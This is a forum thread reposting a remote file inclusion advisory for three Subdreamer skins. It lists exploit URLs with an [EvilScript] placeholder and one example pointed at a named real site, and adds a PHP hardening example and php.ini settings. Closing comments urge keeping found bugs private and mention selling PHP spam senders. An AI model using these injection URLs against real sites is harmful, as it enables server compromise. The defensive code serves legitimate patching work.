kw3rln

[RST] 3 subdreamer skins - RFI


example: http://www.luchino.com.br/skins/bobbyzhuo/bobby1.php?pluginpath[0]=teeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee

---------------------------------------------------------------------------

Subdreamer templates - Remote File Include Vulnerabilities

---------------------------------------------------------------------------

Discovered By fluffy_bunny [ Romanian Security Team ] : hTTp://RSTZONE.NET :

Remote : Yes

Critical Level : Dangerous

---------------------------------------------------------------------------

Affected software description :

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Subdreamer Skins:

1.bobbyzhuo

2.gate_to_americana

3.refresh

------------------------------------------------------------------

Exploit:

~~~~~~~

Variable $pluginpath[0] is not sanitized. When register_globals=on an attacker can exploit this vulnerability with a simple PHP injection script.

# http://www.site.com/[path]/skins/bobbyzhuo/bobby1.php?pluginpath[0]=[EvilScript]

# http://www.site.com/[path]/skins/gate_to_americana/gta1.php?pluginpath[0]=[EvilScript]

# http://www.site.com/[path]/skins/refresh/design1.php?pluginpath[0]=[EvilScript]

---------------------------------------------------------------------------

*/

Contact:

~~~~~~~

Nick: fluffy_bunny

Homepage: hTTp://RSTZONE.NET [ in construction ]

/*

-------------------------------- [ EOF] ----------------------------------

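The advisory above reports that `$pluginpath[0]` reaches an `include()` unsanitized and, with `register_globals=on`, can be set straight from the query string. The following is an added example (not code from the Subdreamer skins or from the advisory) of how such a skin file is hardened: the parameter is read explicitly from `$_GET`, restricted to a plain directory name, and resolved with `realpath()` so that only a directory beneath a fixed plugin directory can ever be included. The file layout (`SKIN_DIR`, a `plugins/` directory, a `header.php` per plugin, a `default` plugin) is an assumption made for this illustration, not the real skin's structure.

```php
<?php
// Added example, not code from the Subdreamer skins or the advisory above.
// Assumed layout for this illustration: each plugin lives in
// SKIN_DIR/<name>/header.php and a "default" plugin always exists.

declare(strict_types=1);

define('SKIN_DIR', __DIR__ . '/plugins');

// Pattern the advisory describes (shown for comparison, never run here):
//   include($pluginpath[0] . '/header.php');
// With register_globals=on, $pluginpath[0] comes from ?pluginpath[0]=... and
// include() will happily open a remote URL (allow_url_include=On) or an
// arbitrary local path, which is the RFI/LFI the advisory reports.

/**
 * Resolve a plugin directory name to an absolute path under SKIN_DIR.
 * Returns null for anything that is not a known, local plugin directory,
 * so URLs, "..", absolute paths and stray characters never reach include().
 */
function resolvePluginPath(string $name): ?string
{
    // Allow-list the characters of a directory name; reject everything else.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }

    $base = realpath(SKIN_DIR);
    $candidate = realpath(SKIN_DIR . '/' . $name);
    if ($base === false || $candidate === false || !is_dir($candidate)) {
        return null;
    }

    // realpath() has already collapsed ".." and symlinks, so a prefix check
    // against the canonical base directory is meaningful.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }

    return $candidate;
}

// Read the parameter explicitly instead of relying on register_globals.
$requested = (isset($_GET['pluginpath'][0]) && is_string($_GET['pluginpath'][0]))
    ? $_GET['pluginpath'][0]
    : 'default';

// Unknown or malformed values fall back to the default plugin rather than
// being passed through; a missing default is a deployment error.
$pluginDir = resolvePluginPath($requested) ?? resolvePluginPath('default');
if ($pluginDir === null) {
    http_response_code(500);
    exit('skin misconfigured: default plugin directory missing');
}

require $pluginDir . '/header.php';
```

The code-level check is the part that survives a misconfigured server, but the two settings the advisory hinges on should also be off in php.ini: `register_globals=Off` (removed entirely in PHP 5.4) and `allow_url_include=Off`, which stops `include()` from fetching remote URLs at all. Requests carrying a URL scheme or `..` in a `pluginpath[]` value are worth alerting on in web server logs regardless of whether the fix is deployed.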

Guest flama
See if maybe you accidentally find other vulns too :P
Well done! And ... let's keep it inside ... within the RST community

scarto, if you'll allow me to read between the lines and translate what you said:

I'M A SPAMMER / I make PHP senders and sell them, and I want as many PHP bugs as possible, as private as possible, so they don't go away quickly.

right?
